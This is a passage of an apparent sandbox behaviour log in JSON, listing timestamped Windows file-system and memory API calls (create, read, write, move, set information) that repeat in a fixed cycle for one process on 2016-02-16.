17:41:54,651", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,661", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,671", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,671", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,681", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,691", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,701", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,711", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:54,711", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,721", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,731", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:54,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,741", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,741", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,751", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,761", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,771", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:54,781", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,791", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,801", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,821", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:54,831", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,831", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,841", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:54,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,861", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,871", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,871", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,881", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,901", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,911", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,931", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,931", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,941", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:54,941", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,951", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,951", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtWriteFile"}, {"category": 